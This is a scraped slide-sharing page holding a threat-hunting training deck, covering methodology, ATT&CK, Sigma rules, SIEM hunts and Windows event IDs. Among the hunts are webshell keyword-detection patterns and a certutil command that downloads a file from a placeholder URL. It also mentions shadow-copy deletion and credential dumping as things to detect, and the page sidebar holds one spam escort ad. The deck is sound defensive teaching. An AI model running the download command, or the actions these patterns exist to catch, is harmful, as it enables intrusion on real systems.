 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion Techniques
 

Recently uploaded

APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 

Recently uploaded (20)

APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

Threat hunting in cyber world

  • 2. AKASH SARODE @AKKY2892  Threat Hunter  Security researcher  Twitter - @Akky2892  Blog – https://akkysanj.wordpress.com  Github - https://github.com/akky2892  Creator of NoMoreMalware and HuntIT.  Author of multiple whitepapers – Machine learning- Learning cybersecurity, Threat hunting – Hunter or Hunted, Analysis Using Analytics In Cybersecurity.  Previous Training – Machine learning : The Future.
  • 3. COURSE DESCRIPTION  Introduction to Threat Hunting  Threat Hunting Terminology  Threat Intelligence and IOC  Hunting methodology  Threat hunting - Network, Endpoint level  Operationalizing & Automating Threat hunting  Use case of Real-time Threat Hunting  Research & Resources  Further study and Road Ahead
  • 4. COURSE INDEX 1. Introduction to Threat Hunting • Threat hunting in Cyberworld • Why to perform threat hunting 2. Terminologies in hunting 3. Introducing Threat Intelligence • Threat Intelligence and Threat Hunting = Intelligent hunting • Indicators of Compromise IOC 4. Threat Hunting methodology • Threat hunting process & Threat Hunting loop • Threat Hunting techniques • Pyramid of pain • Hunting Maturity model
  • 5. COURSE INDEX 5. Network hunting and Endpoint hunting • Hunting Webshells • Hunting malware • Network traffic hunting 6. Using MITRE ATT&CK framework • Sigma rules for threat hunting 7. Threat Hunting using SIEM 8. Examples of Threat hunting hunts 9. Real World Hunting Process 10. Machine Learning & Threat Hunting – Advanced hunting 11. Threat Hunting Resources 12. Conclusion • Red Teamer cyber kill chain vs Blue teamer defense chain
  • 6. INTRODUCTION TO THREAT HUNTING  The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.  My definition – Finding stuff.  Threat Hunting is not a Technology but Approach.  Data- driven approach rather than traditional alert-driven approach.  Applying our knowledge in an effective way to look out for any anomalies in the environment.  Two ways to perform hunting –  Manual  Automated/Machine-assisted
  • 7.
  • 8. THREAT HUNTING IN CYBERWORLD  In Cyberworld, attackers are getting intelligent day-by-day.  Modern-day attacks cannot be prevented/detected by alerts generated from SIEM.  Need of hour – Next generation detection system.  Hunting – not tool dependent, its people dependent.  Machine Learning can help to certain extent but manual intervention in triage is always required.  Instead of reacting to attacks, lets start proactively looking for threats before attack happens.
  • 9. WHY TO PERFORM THREAT HUNTING  Alert driven approach is not sufficient.  Hypothesis driven approach will be the future.  Dependency on tools should be eradicated.  Hunting can be performed on any tool.  Benefit - Continuous improvement in detection capabilites, find unknown malicious activity
  • 10. TERMINOLOGIES IN THREAT HUNTING  SIEM – Security Information & Event management  IOC- Indicators of Compromise  TTP – Tools, Techniques & procedures  IR- Incident response  EDR – Endpoint detection and response  UEBA – User entity and behavior analytics  BIOC – Behavior indicators of compromise
  • 11. THREAT INTELLIGENCE  Threat Intelligence are feeds which are received in the form of urls, files, domains, etc.  Can be used to perform intelligent hunting.  IOC’s of attack/threat are generated by various research companies.  Sources –  articles,  security news,  new APT public report,  Twitter
  • 12. THREAT INTELLIGENCE  BIOC – Behavioral Indicators.  Threat Hunting is effective by proper intels.  Threat Intel team proposes new intel, CIRT team builds hypothesis and create detection based on intel, Threat hunting team hunts with or without intel.  Various vendors are in market- Cisco Talos, Palo alto Unit 42, Cylance, AlienVault OTX, MISP, Yara rules. Threat Intelligence + Threat Hunting = Intelligent Hunting
  • 13. THREAT HUNTING METHODOLOGY  Different methods to perform threat hunting.  We will be explaining the following –  Threat Hunting process  Threat Hunting loop  Pyramid of pain  Hunting Maturity model  ATT&CK for hunts  Hunt or be Hunted
  • 14. THREAT HUNTING PROCESS  Ways of hunting –  Manual – Analyst need to continuously looking for anything that could be evidence/indicator of intrusion.  Important for the threat hunter to keep current on the latest security research.  Automated/Machine-assisted – Analyst uses software that leverages “Machine Learning” and “UEBA” to inform analyst about potential risks.  • It helps in providing Predictive and Prescriptive analytics.
  • 15. THREAT HUNTING PROCESS  Hypothesis driven approach  What is Hypotheses ?  Assumption on attack behavior.  Actionable use case based on observations, intelligence, and experience  Three types of hypotheses:  Analytics-Driven: "Machine-learning and UEBA, used to develop aggregated risk scores that can also serve as hunting hypotheses"[5]  Situational-Awareness Driven: "Crown Jewel analysis, enterprise risk assessments, company- or employee-level trends"[5]  Intelligence-Driven: "Threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"[  Hypothesis can be developed using any public APT report, twitter, security news, articles etc.
  • 18. THREAT HUNTING TECHNIQUES  Searching - use of specialized queries that return results and artifacts.  Clustering - machine learning model that uses advanced AI search techniques to make correlations within advanced and vast arrays of data.  Grouping – grouping artifacts together to identify any anomalies  Stack counting - stacking is how many times each unique value of column has occurred, like least commonly accessed file, rarity is suspicious.
  • 20. THREAT HUNTING MATURITY MODEL Source : sqrrl TMM
  • 21. MITRE ATT&CK FRAMEWORK  MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.  It consists of TTP’s – Tactics, Techniques and procedures.  MITRE has also came up with a project name “CAR” Cyber Analytics Repository.  The Mitre team has listed down all those adversary behaviors and attack vectors carries out by an adversary on a victim machine.  It uses TTP’s Tactics, Techniques and Procedures and maps it to Cyber Kill chain.
  • 23. SIGMA RULES FOR THREAT HUNTING  Sigma is Generic Signature Format for SIEM Systems written by Florian Roth @Neo23x0 and Thomas Patzke.  Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner.  Sigma is for log files what Snort is for network traffic and YARA is for files.  Sigma rules contains mapping of all ATT&CK techniques.  Using sigma for threat hunting in siem, refer Sigma-to project:-  https://github.com/akky2892/Sigma-to
  • 24. HUNTING WEBSHELLS  A web shell is a script written in the supported language of a target web server to be uploaded to enable remote access of the machine.  Mostly written in php or Asp  Multiple attack techniques can be used to upload webshell on webserver – XSS, SQL injection, RFI, LFI & many more…  Popular webshells – C99, R57, etc.  Let’s Hunt it!
  • 25. HUNTING WEBSHELLS - KEYWORDS  First way for hunting webshells – Look out for reference to suspicious keywords within files on webserver - eval() or cmd.exe  For linux –  Under var/www/html directory, we can search for any php files with suspicious commands  find . –type ‘*.php’ | xargs egrep –l “(fsockopen|mail|exec|eval|system|base64_decode)”  For Windows –  Use Powershell to search in similar way  Get-childitem –recurse –include “*.php” | select-string “(fsockopen|mail|exec|eval|system|base64_decode)” | %{“$($._filename)”}
  • 26. HUNTING WEBSHELLS - TOOLS  Multiple tools can be used to hunt for webshells in your environment. These tools are integrated with IOC’s , YARA rules to identify maliciousness.  LOKI IOC Scanner  PHP-Malware Finder  unPHP  Linux Malware detect  Invoke-ExchangeWebShellHunter  etc…  In addition to these techniques, we can also use baselines deviation and file stacking technique to hunt for webshell.
  • 27. ENDPOINT HUNTING  Endpoint is where the malware behavior is more prevalent.  Most of the post-exploitation techniques can be hunted using Endpoint logs.  File activity, Registry activity, Process activity can be used to hunt out for any malicious behavior.  Multiple attack techniques such as DLL injection, hook injection, fuzzy hashing can be hunted down using endpoint logs.  ATT&CK MITRE is the best way to utilize the efforts and use these to hunt out for threats.
  • 28. DLL HIJACKING  Post exploitation technique  Monitoring of Windows API calls, monitoring of windows registry path for any changes.  VirtualAllocEx reserves or changes a region of memory  WriteProcessMemory writes data to an area of memory in a specified process  CreateRemoteThread creates a thread in the address space of another process
  • 29. APPININT DLLS  Powershell contains powersploit which can be used for code injection.  Monitoring malicous DLL loads - AppInit DLLs//// DLLs that are specified in the AppInit_DLLs value in the Registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows are loaded by user32.dll into every process that loads user32.dll.
  • 30. NETWORK HUNTING  Network Traffic hunting requires network traffic logs.  Multiple tools can be used to analyze suspicious network traffic.  In addition to packet capturing, malicious traffic analysis features in Next Generation Firewall, UTM, IDS/IPS, we also need to hunt for traffic which has bypassed these devices.  Wireshark can be used.  Let’s look at simple example :-
  • 31. NETWORK HUNTING – HTTPS TRAFFIC Normal HTTPS Suspicious HTTPS Port 443 or 8443 Malware use this port as well. Traffic is encrypted If traffic is not encrypted & secure socket layer packet details are empty, something suspicious Web server in FQDN format Server will point to IP address instead of FQDN HTTPS is Secure version -Secure socket Layer (SSL/TLS)
  • 32. NETWORK HUNTING – HTTPS TRAFFIC
  • 33. THREAT HUNTING USING SIEM  Threat Hunting is basically searching something.  We need to have proper & useful data to hunt for threats in enterprise.  SIEM – Security Information & Event Management is such tool which can prove to be useful in threat hunting.  SIEM collects logs from multiple devices of your network enterprise.  In addition to threat intelligence feeds, SIEM is very useful in querying the log database to identify any anomaly.  Let’s look at some of use cases:-
  • 34. THREAT HUNTING USING SIEM Source : elastic.co
  • 35. THREAT HUNTING USING SIEM Famous Email word/excel Macro attachments:- • Phishing email containing .doc with macro file • Macro contains script to initiate powershell.exe • Powershell.exe uses legitimate tools like mimikatz for credential dump for gaining hashes from memory. • What commands are executed using mimikatz.
  • 36. THREAT HUNTING USING SIEM  Event viewer logs in SIEM can be useful to hunt for multiple threats.  Sysmon can be used to collect logs specific to endpoint systems based on defined configuration.  Search queries are useful in identifying any malicious behavior inside the enteprise environment.  In addition to threat intelligence and search queries, analytics is being used in SIEM which uses Machine learning to automatically identify any anomalies inside the environment.  We will look out for some examples of hunts to be clear -
  • 37. THREAT HUNTING HUNTS Threat activity Hunts to look out for Hunting suspicious accounts See for any unusual accounts logged into machines with admin right – Event ID – 4672 (Special privileges assigned to new logon) Hunting Scheduled tasks Event ID – 4698, 106, 200 & 201 Hunting Pass the hash (PTH) Event ID- 4624 with logon type 3 Logon process – NtLmSsp, Key length – 0 Hunting for service creation Event ID- 4697 Hunting network shares Event ID - 4776 Hunting for process masquerading Look out for process path form where process is executing – Example explorer.exe should run from C:Windowsexplorer.exe or C:Windowssystem32explorer.exe
  • 38. THREAT HUNTING HUNTS  PTH – Look for remote logins associated with execution/writing of binaries.  IFEOI – Changes to path - HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsxyz.exeDebugger  Rundll32.exe making connection to internet.  Deletion of shadow copy file using wmic, vssadmin | *delete
  • 39. THREAT HUNTING HUNTS  Disable system restore - Registry Write and Key = HKLMSoftwareMicrosoftWindows NtSystemRestoreDisableSR and value = 1  Connection to process other than browser to suspicious domains like .tk, .onion,.tor2web etc.  Certutil.exe used to download files from internet - certutil.exe -urlcache -split -f http://example/file.txt
  • 40. THREAT HUNTING HUNTS  Monitor scheduled tasks – at and schtasks windows task scheduler used to schedule scripts to be executed.  Double extensions malwares  Control.exe used to execute file stored in ADS.  Gpscript.exe used to executes logon scripts.  Mavinject.exe used to execute, read ADS files.  Hh.exe – executing and downloading files  Scriptrunner.exe – execution  Regsvr32.exe – Download script from internet All are windows signed binaries, so none of Endpoint protection will tag it.
  • 41. THREAT HUNTING HUNTS  Similar to the discussed hunts, there are multiple techniques which can be used to hunt for threats.  A collection of many such techniques is collaborated and presented by ATT&CK MITRE & Sigma rules.  Hunting using SIEM is the way ahead but there are multiple SIEM vendors – RSA, Elasticsearch, Arcsight, Qradar etc.  In order to make life easy, I have prepared a Master Sheet of threat hunting hunts mapping it to respective SIEM vendors-  Query it & Hunt IT - https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
  • 42. REAL WORLD HUNTING PROCESS What is threat hunting:- The human-centric process of proactively searching for evidence of attacks. Anyone can threat hunt; experienced threat hunters have better models. Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting. In Attack centric hunting (ACH), you focus on seeking evidence that identifies a specific attack. It's a 4 step process that starts with a question.  1. Question - Has an Attack incident occurred on my network?  2. What am I looking for?  3. Where am I likely to find it?  4. How can I manipulate the data to find it?
  • 43. REAL WORLD HUNTING PROCESS Example: Question: Has Credential theft happened on my network?  1. What am I looking for? a) Evidence of credential dumping application execution. b) never before seen processes, process anomalies.  2. Where am I likely to find it ? a) Windows process execution logs.  3. How can I manipulate the data to see it ? a) Aggregate EID 4688 by process name for all endpoints and sort by least frequent occurrence (LFO). (Event ID4688 = Process Execution event ID. )
  • 44. MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING  Multiple SIEM vendors, or security product solutions uses Machine Learning or AI to assist threat hunting.  Machine learning uses Classification, Association algorithms to identify & detect any kind of anomalies in network.  Network traffic spike, unusual user account, computer account behavior, any deviation from baselines can be identified by such techniques.  Analytics is widely used in modern day world and it has find it place in Cyber security as well.  Microsoft Defender, Microsoft ATA, Qradar SIEM, Fireeye, etc.
  • 45.
  • 46. MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING
  • 48. THREAT HUNTING RESOURCES  Threathunting.net  MITRE ATT&CK - attack.mitre.org  https://github.com/ThreatHuntingProject/ThreatHunting - David J Bianco  https://github.com/VVard0g/ThreatHunter-Playbook - Roberto Rodriguez (@Cyb3rWard0g)  https://blog.menasec.net  https://github.com/akky2892/Cyber-Threat-Hunting  Whitepapers, blogs, articles on threat hunting.  Research work on twitter - Oddvar Moe, Florian roth, Roberto rodriques, Olaf hangton, David J Bianco, sqrrl, Samir @ Sbousseaden & many more.  Sans – Threat Hunting Summit, defcon, Att&ckon, Derbycon, Nullcon Webinars/Webcasts …
  • 49. CONCLUSION Red Teamer Cyber Kill Chain Blue Teamer Defense Chain Identify Preven t Detect Respond Recover